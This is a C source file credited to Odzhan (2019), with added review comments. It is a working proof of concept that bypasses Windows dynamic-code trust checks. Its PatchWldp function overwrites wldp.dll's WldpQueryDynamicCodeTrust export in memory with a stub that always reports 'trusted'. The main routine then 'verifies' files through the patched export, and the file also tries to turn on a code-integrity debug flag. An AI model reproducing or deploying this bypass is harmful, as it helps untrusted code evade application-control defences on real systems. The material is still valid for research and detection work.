  1. /**
  2. BSD 3-Clause License
  3.  
  4. Copyright (c) 2019 Odzhan. All rights reserved.
  5.  
  6. Redistribution and use in source and binary forms, with or without
  7. modification, are permitted provided that the following conditions are met:
  8.  
  9. * Redistributions of source code must retain the above copyright notice, this
  10. list of conditions and the following disclaimer.
  11.  
  12. * Redistributions in binary form must reproduce the above copyright notice,
  13. this list of conditions and the following disclaimer in the documentation
  14. and/or other materials provided with the distribution.
  15.  
  16. * Neither the name of the copyright holder nor the names of its
  17. contributors may be used to endorse or promote products derived from
  18. this software without specific prior written permission.
  19.  
  20. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  21. AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  22. IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  23. DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  24. FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  25. DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  26. SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  27. CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  28. OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  29. OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  30. */
  31.  
  32. #include <windows.h>
  33. #include <wldp.h>
  34. #include <stdio.h>
  35.  
  36.  
// Function-pointer type for wldp!WldpIsDynamicCodePolicyEnabled, resolved
// at runtime with GetProcAddress in main(). Judging by the name and the
// PBOOL out-parameter it reports whether a dynamic-code policy is in force
// for the calling process; the HRESULT is the call status.
typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
PBOOL isEnabled);

// Function-pointer type for wldp!WldpQueryDynamicCodeTrust, the export that
// VerifyCodeTrust() calls and that PatchWldp() overwrites. This file always
// passes fileHandle = 0 and a read-only file mapping as baseImage/ImageSize.
typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
HANDLE fileHandle,
PVOID baseImage,
ULONG ImageSize);
  44.  
// Replacement body for wldp!WldpQueryDynamicCodeTrust: unconditionally
// reports S_OK ("trusted"). PatchWldp() copies this function's machine code
// byte-for-byte over the real export, so the body must contain nothing that
// needs a relocation or a reference outside the function (no calls, no
// globals, no string literals). Do not "tidy" it.
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
HANDLE fileHandle,
PVOID baseImage,
ULONG ImageSize)
{
// parameters are deliberately ignored
return S_OK;
}
  53.  
  54. static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
  55.  
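/*
 * Overwrite the entry point of wldp!WldpQueryDynamicCodeTrust in THIS
 * process with WldpQueryDynamicCodeTrustStub, which always returns S_OK.
 *
 * Security notes for whoever reads this next:
 *  - The write lands in the process-private, copy-on-write view of
 *    wldp.dll, so only callers inside this process are affected. Every
 *    VerifyCodeTrust() result from this process is meaningless afterwards.
 *  - Observable footprint: a VirtualProtect() to PAGE_EXECUTE_READWRITE on
 *    an image page of wldp.dll, a write to an exported function, then the
 *    protection being restored.
 *
 * Returns TRUE once the stub bytes have been written, FALSE if wldp could
 * not be loaded, the export could not be resolved, the stub length is not
 * sane, or the page could not be made writable. The original page
 * protection is put back (result not checked, as before) and the
 * instruction cache is flushed so the new bytes are what executes.
 *
 * The stub length is derived from the distance between the stub and its
 * end marker, which assumes the compiler placed the two contiguously and in
 * order (no incremental-link thunks, no identical-code folding) — TODO
 * confirm for the toolchain in use.
 */
static BOOL PatchWldp(VOID) {
    BOOL patched = FALSE;
    HMODULE wldp;
    ULONG_PTR stubStart, stubEnd;
    DWORD len, op, t;
    LPVOID cs;

    wldp = LoadLibrary("wldp");
    if(wldp == NULL) return FALSE;

    // resolve the export we are going to overwrite
    cs = (LPVOID)GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    if(cs == NULL) return FALSE;

    stubStart = (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
    stubEnd   = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd;

    // Reject a zero or negative length instead of feeding a wrapped DWORD
    // to VirtualProtect/memcpy; this happens when the layout assumption
    // documented above does not hold.
    if(stubEnd <= stubStart) return FALSE;
    len = (DWORD)(stubEnd - stubStart);

    // make the target writable
    if(!VirtualProtect(cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;

    // overwrite the export with the stub's machine code
    memcpy(cs, (const void *)stubStart, len);
    patched = TRUE;

    // restore the original protection, then make sure the CPU does not keep
    // executing stale bytes for this range
    VirtualProtect(cs, len, op, &t);
    FlushInstructionCache(GetCurrentProcess(), cs, len);

    return patched;
}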
  90.  
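/*
 * Ask wldp!WldpQueryDynamicCodeTrust whether the file at `path` is trusted
 * under the current dynamic-code policy. The file is mapped read-only and
 * the view is handed over as baseImage/ImageSize with fileHandle = 0.
 *
 * Returns TRUE only when the export returns S_OK. Failure to load wldp or
 * resolve the export (message printed), or to open, size or map the file,
 * yields FALSE. An empty file is rejected, as before.
 *
 * Security note: the answer is only as trustworthy as the code sitting at
 * the export. If PatchWldp() has run in this process the export has been
 * replaced by a stub that returns S_OK, so this function then reports every
 * file as trusted.
 *
 * Fixes vs. the original: a failed GetFileSize() (INVALID_FILE_SIZE) was
 * accepted as a valid size, and a file whose size needs the high DWORD was
 * passed with a truncated ULONG ImageSize. Both are now rejected.
 */
BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust = NULL;
    HMODULE wldp;
    HANDLE file = INVALID_HANDLE_VALUE;
    HANDLE map = NULL;
    LPVOID mem = NULL;
    HRESULT hr = E_FAIL;
    DWORD low = 0, high = 0;

    // load wldp and resolve the verifier; same message for both failures
    wldp = LoadLibrary("wldp");
    if(wldp != NULL) {
        _WldpQueryDynamicCodeTrust = (WldpQueryDynamicCodeTrust_t)
            GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    }
    if(_WldpQueryDynamicCodeTrust == NULL) {
        printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
        return FALSE;
    }

    // open the file for reading only
    file = CreateFile(
        path, GENERIC_READ, FILE_SHARE_READ,
        NULL, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) goto cleanup;

    // INVALID_FILE_SIZE is ambiguous: it is an error only when GetLastError()
    // says so. A non-zero high DWORD cannot be represented in the ULONG
    // ImageSize argument, so such files are refused rather than truncated.
    low = GetFileSize(file, &high);
    if(low == INVALID_FILE_SIZE && GetLastError() != NO_ERROR) goto cleanup;
    if(high != 0 || low == 0) goto cleanup;

    // map the whole file read-only
    map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
    if(map == NULL) goto cleanup;

    mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
    if(mem == NULL) goto cleanup;

    // verify the image in memory
    hr = _WldpQueryDynamicCodeTrust(NULL, mem, low);

cleanup:
    if(mem != NULL) UnmapViewOfFile(mem);
    if(map != NULL) CloseHandle(map);
    if(file != INVALID_HANDLE_VALUE) CloseHandle(file);
    return hr == S_OK;
}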
  137.  
  138. #include "C:\ntlib\ntddk.h"
  139.  
// SYSTEM_INFORMATION_CLASS value used with NtQuerySystemInformation /
// NtSetSystemInformation below.
#define SystemCodeIntegrityInformation 0x67

// Bit flags reported in SYSTEM_CODEINTEGRITY_INFORMATION.CodeIntegrityOptions.
// The names mirror the public SYSTEM_CODEINTEGRITY_INFORMATION documentation;
// ListCIOptions() prints whichever of them are set on this machine.
#define CODEINTEGRITY_OPTION_ENABLED 0x0001
#define CODEINTEGRITY_OPTION_TESTSIGN 0x0002
#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010
#define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
  156.  
// One row of the flag-name table: the bit value and its printable name.
typedef struct _ci_opt {
ULONG ulOption;
PCHAR szOption;
} ci_opt;

// Expands a flag macro to a {value, "NAME"} row so the printed string can
// never drift from the identifier.
#define CI_OPTION_ENTRY(flag) { (flag), #flag }

// Name table for the CODEINTEGRITY_OPTION_* bits, terminated by a zero row;
// ListCIOptions() walks it to print whichever bits are currently set.
ci_opt options[] = {
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_TESTSIGN),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_UMCI_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_TEST_BUILD),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_FLIGHT_BUILD),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_FLIGHTING_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED),
    CI_OPTION_ENTRY(CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED),
    { 0, NULL }
};

#undef CI_OPTION_ENTRY
  179.  
// Buffer layout for the SystemCodeIntegrityInformation class: callers set
// Length to sizeof(struct) before the query and read the flag bits from
// CodeIntegrityOptions afterwards (see ListCIOptions / EnableCIOption).
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
ULONG Length;
ULONG CodeIntegrityOptions;
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
  184.  
/*
 * Print, one per line, the name of every code-integrity flag currently set
 * according to NtQuerySystemInformation(SystemCodeIntegrityInformation),
 * using the file-level `options` table. Prints nothing if the query fails.
 */
VOID ListCIOptions(VOID) {
    SYSTEM_CODEINTEGRITY_INFORMATION info;
    DWORD returned = 0;
    const ci_opt *row;
    NTSTATUS rc;

    info.Length = sizeof(info);
    rc = NtQuerySystemInformation(
        SystemCodeIntegrityInformation,
        &info, sizeof(info), &returned);
    if(!NT_SUCCESS(rc)) return;

    printf("\nCode Integrity Options.\n\n");
    for(row = options; row->ulOption != 0; row++) {
        if((info.CodeIntegrityOptions & row->ulOption) == 0) continue;
        printf("%s\n", row->szOption);
    }
}
  205.  
// NOTE: NtSetSystemInformation(SystemCodeIntegrityInformation, ...) is rejected with
// STATUS_INVALID_INFO_CLASS - the code-integrity flags are not writable from user mode.
// EnableCIOption() below is kept only to demonstrate that; it cannot turn anything on.
  207.  
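/*
 * Attempt to turn on one code-integrity flag through
 * NtSetSystemInformation(SystemCodeIntegrityInformation).
 *
 * Kept as a demonstration: per the comment above, the set call comes back
 * with STATUS_INVALID_INFO_CLASS, i.e. these flags cannot be changed from
 * user mode, so this is expected to print a failing status and return FALSE.
 *
 * Fix vs. the original: `Option` was ignored and
 * CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED was always OR-ed in. The parameter
 * is now honoured; the only caller in this file passes that same flag, so
 * its behaviour is unchanged.
 *
 * Returns TRUE only if the set call succeeded; FALSE if the preceding query
 * failed (nothing is printed in that case) or the set was rejected.
 */
BOOL EnableCIOption(ULONG Option) {
    NTSTATUS status;
    SYSTEM_CODEINTEGRITY_INFORMATION scii;
    DWORD len = 0;

    scii.Length = sizeof(scii);

    // read the current flags so we only add the requested bit
    status = NtQuerySystemInformation(
        SystemCodeIntegrityInformation,
        &scii, sizeof(scii), &len);
    if(!NT_SUCCESS(status)) return FALSE;

    scii.CodeIntegrityOptions |= Option;

    // NOTE(review): the documented NtSetSystemInformation prototype takes
    // three arguments (class, buffer, length); the fourth is kept because it
    // matches the ntddk.h this file is compiled against - confirm.
    status = NtSetSystemInformation(
        SystemCodeIntegrityInformation,
        &scii, sizeof(scii), &len);

    printf("status is %08lx\n", status);
    return NT_SUCCESS(status);
}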
  229.  
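/*
 * Driver: try (and expect to fail) to set a CI flag, dump the flags that are
 * set, report whether a dynamic-code policy is enabled, patch wldp inside
 * this process, then run VerifyCodeTrust() over every file named on the
 * command line.
 *
 * Fixes vs. the original:
 *  - WldpIsDynamicCodePolicyEnabled was resolved from the export
 *    "WldpQueryDynamicCodeTrust" (copy/paste error) and then called through
 *    the one-argument prototype, i.e. the wrong function with the wrong
 *    arguments. It is now resolved from "WldpIsDynamicCodePolicyEnabled".
 *  - A NULL export was reported but still called; it now returns.
 *  - `enabled` is initialised and the call's HRESULT checked, so a failed
 *    query is not reported as "enabled"/"disabled" from garbage.
 *  - GetFileAttributes() failure (INVALID_FILE_ATTRIBUTES has the directory
 *    bit set) used to be skipped silently; missing paths are now reported.
 *
 * Note: once PatchWldp() succeeds every VerifyCodeTrust() result is "OK" by
 * construction - the loop demonstrates the effect of the patch, it does not
 * validate the files.
 */
int main(int argc, char *argv[]) {
    int i;
    HMODULE wldp;
    WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled = NULL;
    BOOL enabled = FALSE;
    HRESULT hr;
    DWORD attrs;

    // expected to be rejected with STATUS_INVALID_INFO_CLASS; prints the status
    EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);

    ListCIOptions();

    // resolve the policy query by its own export name
    wldp = LoadLibrary("wldp");
    if(wldp != NULL) {
        WldpIsDynamicCodePolicyEnabled = (WldpIsDynamicCodePolicyEnabled_t)
            GetProcAddress(wldp, "WldpIsDynamicCodePolicyEnabled");
    }
    if(WldpIsDynamicCodePolicyEnabled == NULL) {
        printf("unable to load Wldp.\n");
        return 0;
    }

    hr = WldpIsDynamicCodePolicyEnabled(&enabled);
    if(hr != S_OK) {
        // leave `enabled` at FALSE rather than trusting an unset out-param
        printf("WldpIsDynamicCodePolicyEnabled returned %08lx.\n", (unsigned long)hr);
    }

    printf("Wldp Code Policy is %s.\n",
        enabled ? "enabled" : "disabled");

    if(!PatchWldp()) {
        printf("unable to patch Wldp.\n");
        return 0;
    }

    for(i = 1; i < argc; i++) {
        attrs = GetFileAttributes(argv[i]);
        // report paths we cannot stat instead of hiding them behind the
        // directory check
        if(attrs == INVALID_FILE_ATTRIBUTES) {
            printf("%-8s : %s\n", "MISSING", argv[i]);
            continue;
        }
        // skip directories
        if(attrs & FILE_ATTRIBUTE_DIRECTORY) continue;
        // "verify" file (see note above about the patched export)
        printf("%-8s : %s\n",
            VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
            argv[i]);
    }
    return 0;
}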